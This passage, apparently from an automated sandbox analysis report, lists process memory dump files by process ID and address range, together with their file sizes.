                                                                            • memory/1588-352-0x00007FFB846B0000-0x00007FFB846C9000-memory.dmp
                                                                              Filesize

                                                                              100KB

                                                                            • memory/1588-351-0x00007FFB72540000-0x00007FFB7265C000-memory.dmp
                                                                              Filesize

                                                                              1.1MB

                                                                            • memory/1588-350-0x00007FFB87E20000-0x00007FFB87E2B000-memory.dmp
                                                                              Filesize

                                                                              44KB

                                                                            • memory/1588-349-0x00007FFB87EB0000-0x00007FFB87EBD000-memory.dmp
                                                                              Filesize

                                                                              52KB

                                                                            • memory/1588-348-0x00007FFB84C40000-0x00007FFB84C54000-memory.dmp
                                                                              Filesize

                                                                              80KB

                                                                            • memory/1588-347-0x00007FFB72A50000-0x00007FFB72DC8000-memory.dmp
                                                                              Filesize

                                                                              3.5MB

                                                                            • memory/1588-345-0x00007FFB88CD0000-0x00007FFB88CDD000-memory.dmp
                                                                              Filesize

                                                                              52KB

                                                                            • memory/1588-344-0x00007FFB84720000-0x00007FFB84739000-memory.dmp
                                                                              Filesize

                                                                              100KB

                                                                            • memory/1588-343-0x00007FFB8A1B0000-0x00007FFB8A1BF000-memory.dmp
                                                                              Filesize

                                                                              60KB

                                                                            • memory/1588-342-0x00007FFB84930000-0x00007FFB84953000-memory.dmp
                                                                              Filesize

                                                                              140KB

                                                                            • memory/1588-341-0x00007FFB85110000-0x00007FFB85127000-memory.dmp
                                                                              Filesize

                                                                              92KB

                                                                            • memory/1588-339-0x00007FFB723C0000-0x00007FFB72537000-memory.dmp
                                                                              Filesize

                                                                              1.5MB

                                                                            • memory/1588-338-0x00007FFB84010000-0x00007FFB84033000-memory.dmp
                                                                              Filesize

                                                                              140KB

                                                                            • memory/1800-210-0x000002042EED0000-0x000002042EED8000-memory.dmp
                                                                              Filesize

                                                                              32KB

                                                                            • memory/3576-92-0x00000259AAD60000-0x00000259AAD82000-memory.dmp
                                                                              Filesize

                                                                              136KB